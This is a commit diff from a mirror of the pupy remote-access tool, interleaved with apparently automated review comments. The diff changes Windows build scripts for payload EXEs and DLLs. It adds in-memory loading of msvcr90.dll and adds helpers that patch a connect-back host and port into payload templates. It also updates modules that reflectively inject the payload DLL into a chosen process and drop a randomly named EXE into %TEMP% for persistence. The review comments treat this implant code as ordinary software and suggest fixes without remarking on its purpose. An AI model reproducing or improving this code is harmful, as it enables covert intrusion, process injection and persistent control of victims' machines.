mirror of https://github.com/n1nj4sec/pupy.git
msvcr90 in memory loading + code cleanup
This commit is contained in:
parent
d9a76dc0b4
commit
390929f316
|
@ -1,9 +1,33 @@
|
|||
#pupy
|
||||
#pupy stuff
|
||||
pupy/data/
|
||||
pupy/.pupy_history
|
||||
.DS_Store
|
||||
# do not ignore package files
|
||||
|
||||
# do not ignore package & templates files
|
||||
!pupy/packages/
|
||||
!pupy/payload_templates/
|
||||
|
||||
#do not redistribute microsoft visual C++ DLLs (LICENSE)
|
||||
client/sources/resources/msvcr90.dll
|
||||
client/sources/resources/msvcr90_x86.dll
|
||||
client/sources/resources/msvcr90_x64.dll
|
||||
|
||||
#Client build related stuff
|
||||
*.obj
|
||||
*.lib
|
||||
*.exp
|
||||
*.exe
|
||||
*.dll
|
||||
client/sources/resources_bootloader_pyc.c
|
||||
client/sources/resources_bootloader.pyc
|
||||
client/sources/resources_python27_dll.c
|
||||
client/sources/resources/library_compressed_string.txt
|
||||
client/sources/resources/python27.dll
|
||||
client/sources/resources_library_compressed_string_txt.c
|
||||
client/sources/resources/library_compressed_string_x86.txt
|
||||
client/sources/resources/library_compressed_string_x64.txt
|
||||
client/sources/resources_msvcr90_dll.c
|
||||
|
||||
|
||||
# Byte-compiled / optimized / DLL files
|
||||
__pycache__/
|
||||
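Review bot: The three new `client/sources/resources/msvcr90*.dll` entries are already matched by the unanchored `*.dll` pattern further down, so they only document the licensing intent stated in the comment above them; if that is the purpose, the comment alone carries it, or the build patterns could be anchored (`client/sources/*.dll`, `client/sources/*.exe`, `client/sources/*.obj`) so the explicit entries actually decide something. Because git applies the last matching pattern, the unanchored `*.dll` also overrides the earlier `!pupy/packages/` re-include for any DLL that might live under `pupy/packages/` — whether such files exist is not visible here, but anchoring the build patterns to `client/sources/` removes the question.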
|
|
|
@ -9,12 +9,15 @@ copy resources\python27_x86.dll resources\python27.dll
|
|||
copy resources\library_compressed_string_x86.txt resources\library_compressed_string.txt
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\library_compressed_string.txt
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll
|
||||
copy resources\msvcr90_x86.dll resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_python_bootloader.py
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_library_compressed_string_txt.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_bootloader_pyc.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_python27_dll.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
|
@ -31,8 +34,9 @@ copy resources\library_compressed_string_x86.txt resources\library_compressed_st
|
|||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c thread.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c remote_thread.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c base_inject.c /IC:\Python27\include
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.exe
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.dll /LD
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.exe
|
||||
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.dll /LD
|
||||
copy pupyx86.dll ..\..\pupy\payloads\
|
||||
copy pupyx86.exe ..\..\pupy\payloads\
|
||||
|
||||
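Review bot: The new `copy resources\msvcr90_x86.dll resources\msvcr90.dll` line has no failure handling, and the same commit adds that file to .gitignore, so on a checkout that lacks the redistributable the copy fails, `gen_resource_header.py resources\msvcr90.dll` presumably fails as well, and the later `cl.exe` lines still run and link against whatever `resources_msvcr90_dll.obj` is lying around; a guard such as `if not exist resources\msvcr90_x86.dll exit /b 1` before the copy makes the dependency explicit. The absolute `C:\Users\me\...\cl.exe` path is now repeated on every compile line; hoisting it into a variable (`set "CC=..."` and `"%CC%" /c ...`) would make the script usable on a build machine other than the author's. The x64 script in the next file section has the same shape.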
|
|
|
@ -10,11 +10,14 @@ copy resources\library_compressed_string_x64.txt resources\library_compressed_st
|
|||
copy resources\python27_x64.dll resources\python27.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll
|
||||
"C:\\Python27\\python.exe" gen_python_bootloader.py
|
||||
copy resources\msvcr90_x64.dll resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll
|
||||
"C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_library_compressed_string_txt.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_bootloader_pyc.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_python27_dll.c
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\adm64\cl.exe" /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
|
@ -31,8 +34,8 @@ copy resources\python27_x64.dll resources\python27.dll
|
|||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c thread.c /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c remote_thread.c /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c base_inject.c /IC:\Python27\include /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.exe /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.dll /LD /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.exe /D_WIN64
|
||||
"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.dll /LD /D_WIN64
|
||||
|
||||
copy pupyx64.dll ..\..\pupy\payloads\
|
||||
copy pupyx64.exe ..\..\pupy\payloads\
|
||||
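Review bot: The new compile line `"...\VC\Bin\adm64\cl.exe" /c resources_msvcr90_dll.c` spells the directory `adm64` while every other line in the file uses `amd64`, so that command cannot start and `resources_msvcr90_dll.obj`, which both link lines in the second hunk now reference, is never produced by this script; the fix is the one-character change to `"...\VC\Bin\amd64\cl.exe" /c resources_msvcr90_dll.c`. Because nothing in the script checks the errorlevel, the typo only shows up as an unresolved object at link time rather than at the failing step, which is another argument for the `if not exist` / `set "CC=..."` treatment suggested for the x86 script.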
|
|
|
@ -17,6 +17,8 @@ extern const char resources_python27_dll_start[];
|
|||
extern const int resources_python27_dll_size;
|
||||
extern const char resources_bootloader_pyc_start[];
|
||||
extern const int resources_bootloader_pyc_size;
|
||||
extern const char resources_msvcr90_dll_start[];
|
||||
extern const int resources_msvcr90_dll_size;
|
||||
extern const char resource_python_manifest[];
|
||||
|
||||
extern DL_EXPORT(void) init_memimporter(void);
|
||||
|
@ -41,19 +43,22 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
char * ppath;
|
||||
FILE * f;
|
||||
char tmp_python_dll_path[MAX_PATH];
|
||||
char tmp_manifest_path[MAX_PATH];
|
||||
//char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_path[MAX_PATH];
|
||||
ACTCTX ctx;
|
||||
BOOL activated;
|
||||
HANDLE k32;
|
||||
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
PyGILState_STATE restore_state;
|
||||
|
||||
//InitializeCriticalSection(&csInit);
|
||||
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
//InitializeCriticalSection(&csInit);
|
||||
/*
|
||||
k32 = LoadLibrary("kernel32");
|
||||
CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA");
|
||||
ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx");
|
||||
|
@ -66,7 +71,6 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
return 0;
|
||||
}
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
ZeroMemory(&ctx, sizeof(ctx));
|
||||
ctx.cbSize = sizeof(ACTCTX);
|
||||
GetTempFileName(tmp_path, "tmp", 0, tmp_manifest_path);
|
||||
|
@ -88,12 +92,12 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
#ifndef QUIET
|
||||
DeleteFile(tmp_manifest_path);
|
||||
#endif
|
||||
|
||||
*/
|
||||
|
||||
if(!Py_IsInitialized)
|
||||
{
|
||||
int res=0;
|
||||
activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
//activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
|
||||
#ifndef QUIET
|
||||
|
@ -177,11 +181,13 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
//if (PyErr_Occurred())
|
||||
// PyErr_Print();
|
||||
Py_Finalize();
|
||||
/*
|
||||
if (!DeactivateActCtx(0, actToken)){
|
||||
#ifndef QUIET
|
||||
printf("LOADER: Error deactivating context!\n!");
|
||||
#endif
|
||||
}
|
||||
*/
|
||||
//DeleteCriticalSection(&csInit);
|
||||
|
||||
return 0;
|
||||
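Review bot: The new `_load_python("msvcr90.dll", resources_msvcr90_dll_start);` at the top of mainThread discards its return value, whereas the existing python27 load a few lines below is guarded with `if(!_load_python("python27.dll", resources_python27_dll_start)){`, so a failed CRT load is only noticed later and indirectly; checking it the same way, `if(!_load_python("msvcr90.dll", resources_msvcr90_dll_start)) return 0;`, with the same `#ifndef QUIET` diagnostic the python27 branch uses, keeps the two loads consistent. The commit is titled "code cleanup", but the activation-context code is left behind as `/* ... */` and `//` blocks rather than deleted, and the declarations they used — `ACTCTX ctx;`, `BOOL activated;`, `HANDLE k32;` and the four commented function-pointer lines — remain in the locals; removing them (the history is in git) would make the cleanup real and silence unused-variable warnings. mainThread begins before the first hunk of this function and continues past the last one.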
|
|
|
@ -19,6 +19,18 @@ import argparse
|
|||
import sys
|
||||
import os.path
|
||||
|
||||
def get_edit_pupyx86_dll(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx86.dll"), host, ip)
|
||||
|
||||
def get_edit_pupyx64_dll(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx64.dll"), host, ip)
|
||||
|
||||
def get_edit_pupyx86_exe(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx86.exe"), host, ip)
|
||||
|
||||
def get_edit_pupyx64_exe(host, ip):
|
||||
return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), host, ip)
|
||||
|
||||
def get_edit_binary(path, host, ip):
|
||||
binary=b""
|
||||
with open(path, 'rb') as f:
|
||||
|
@ -45,35 +57,35 @@ def get_edit_binary(path, host, ip):
|
|||
|
||||
if __name__=="__main__":
|
||||
parser = argparse.ArgumentParser(description='Process some integers.')
|
||||
parser.add_argument('-t', '--type', default='exe_x86', help="exe_x86/dll_x86 exe_x64/dll_x64 (default: exe_x86)")
|
||||
parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)")
|
||||
parser.add_argument('-o', '--output', help="output path")
|
||||
parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)")
|
||||
parser.add_argument('host', help="connect back host")
|
||||
args=parser.parse_args()
|
||||
outpath=None
|
||||
if args.type=="exe_x86":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx86.exe"), args.host, args.port)
|
||||
binary=get_edit_pupyx86_exe(args.host, args.port)
|
||||
outpath="pupyx86.exe"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="exe_x64":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx64.exe"), args.host, args.port)
|
||||
binary=get_edit_pupyx64_exe(args.host, args.port)
|
||||
outpath="pupyx64.exe"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="dll_x64":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx64.dll"), args.host, args.port)
|
||||
binary=get_edit_pupyx64_dll(args.host, args.port)
|
||||
outpath="pupyx64.dll"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write(binary)
|
||||
elif args.type=="dll_x86":
|
||||
binary=get_edit_binary(os.path.join("payloads","pupyx86.dll"), args.host, args.port)
|
||||
binary=get_edit_pupyx86_dll(args.host, args.port)
|
||||
outpath="pupyx86.dll"
|
||||
if args.output:
|
||||
outpath=args.output
|
||||
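Review bot: The four new helpers name their second parameter `ip` although every caller passes `args.port` or `port` and the value is forwarded into `get_edit_binary`'s `ip` slot; since these names are introduced by this commit, `def get_edit_pupyx86_dll(host, port):` (and likewise for the other three) would say what is actually patched in, while the pre-existing `get_edit_binary(path, host, ip)` signature and the `--port` help text "connect back ip" carry the same confusion but are outside this change. The `payload_templates` path is joined relative to the current working directory, so the helpers only work when the process is started from the directory containing it; resolving against the module, e.g. `os.path.join(os.path.dirname(__file__), "payload_templates", "pupyx86.dll")`, removes that dependency for the module callers in the later sections. In the `__main__` chain the `if args.output:` / `with open(outpath, 'wb')` block is repeated in each branch; now that `--type` has `choices`, a single write after the chain would do.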
|
|
|
@ -39,10 +39,10 @@ class MigrateModule(PupyModule):
|
|||
if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid):
|
||||
isProcess64bits=True
|
||||
self.success("process is 64 bits")
|
||||
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port)
|
||||
dllbuff=genpayload.get_edit_pupyx64_dll(host, port)
|
||||
else:
|
||||
self.success("process is 32 bits")
|
||||
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port)
|
||||
dllbuff=genpayload.get_edit_pupyx86_dll(host, port)
|
||||
self.success("injecting DLL in target process %s ..."%args.pid)
|
||||
self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits)
|
||||
self.success("DLL injected !")
|
||||
|
|
|
@ -27,7 +27,7 @@ class PersistenceModule(PupyModule):
|
|||
|
||||
self.info("generating exe ...")
|
||||
#generating exe
|
||||
exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port)
|
||||
exebuff=genpayload.get_edit_pupyx86_exe(host, port)
|
||||
|
||||
remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])))
|
||||
self.info("uploading to %s ..."%remote_path)
|
||||
|
|